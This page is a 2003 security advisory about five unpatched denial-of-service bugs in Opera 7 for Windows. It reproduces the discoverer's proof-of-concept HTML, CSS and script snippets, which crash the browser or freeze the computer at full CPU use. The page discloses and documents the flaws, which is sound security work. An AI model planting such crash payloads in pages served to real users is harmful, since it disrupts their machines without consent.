Skip navigation
Menu
Security

Denial of Service in Opera

Reported June 30, 2003, by ::Operash::.


VERSIONS AFFECTED

Opera for Windows, versions 7.11b (build 2887), 7.11 (build 2880), 7.10 (build 2840), and 7.03 (build 2670)

DESCRIPTION

Five new unfixed bugs in Opera 7 for Windows Web browser can result in a Denial of Service (DoS) condition.

DEMONSTRATION

The discoverer posted the following demonstrations as proof of concept:

2. SAMPLE CODE & IMPACT

=========================

\[ CODE 1 \]

Just 12 bytes data "<!DOCTYPE" + NULL(\x00) + 1byte + ">" makes

CPU usage go up to 100%(depending on comp specs) and the computer

gets freeze down.

-----------------------------------------------------------------
<!DOCTYPE\[\x00\]A>
-----------------------------------------------------------------

\[ CODE 2 \]

Abnormal termination is caused.

-----------------------------------------------------------------
<form></form><script>document.forms\[0\].submit()</script>
-----------------------------------------------------------------

\[ CODE 3 \]

Abnormal termination is caused.

-----------------------------------------------------------------
<table>
<tr id="crash" style="display:inline"><td>
<script>crash.style.display = "none";</script>
</td></tr>
</table>
-----------------------------------------------------------------

\[ CODE 4 \]

Abnormal termination is caused.

-----------------------------------------------------------------
<table>
<map id="crash" style="position:absolute"></map>
<script>crash.style.height = crash.style.width = '0';</script>
</table>
-----------------------------------------------------------------

\[ CODE 5 \]

CPU usage goes up to 100% (depending on its specs) and the computer
freezes.
-----------------------------------------------------------------

<html>
<head>
<style type="text/css">
<!--
.aaaaa:after\{content:"A";display:block\}
.bbbbb\{display:run-in\}
.ccccc\{display:inline-block\}
//-->
</style>
</head>
<body>
<div class="aaaaa">
<div class="bbbbb">
<div class="ccccc">
</div>
</div>
</div>
</body>
</html>
-----------------------------------------------------------------

VENDOR RESPONSE

Opera was notified on June 24, 2003, but hasn't yet responded to these problems.

CREDIT
Discovered by :: Operash ::.

TAGS: Security
Hide comments

More information about text formats

Comments

  • Allowed HTML tags: <em> <strong> <blockquote> <br> <p>

Plain text

  • No HTML tags allowed.
  • Web page addresses and e-mail addresses turn into links automatically.
  • Lines and paragraphs break automatically.
Publish
Recommended Reading
software defined storage solutions.jpg
Enterprise Data Storage Environments Riddled With Vulnerabilities
Oct 15, 2021
open-source101.jpg
KubeCon + CloudNativeCon Highlights Security for Open Source
Oct 15, 2021
US capitol building in red and blue
Big Tech Faces New Bills on Liability and Competition in U.S
Oct 14, 2021
covid-vaccine.jpg
IBM Tells U.S. Staff to Get Vaccine by Dec. 8 or Face Suspension
Oct 07, 2021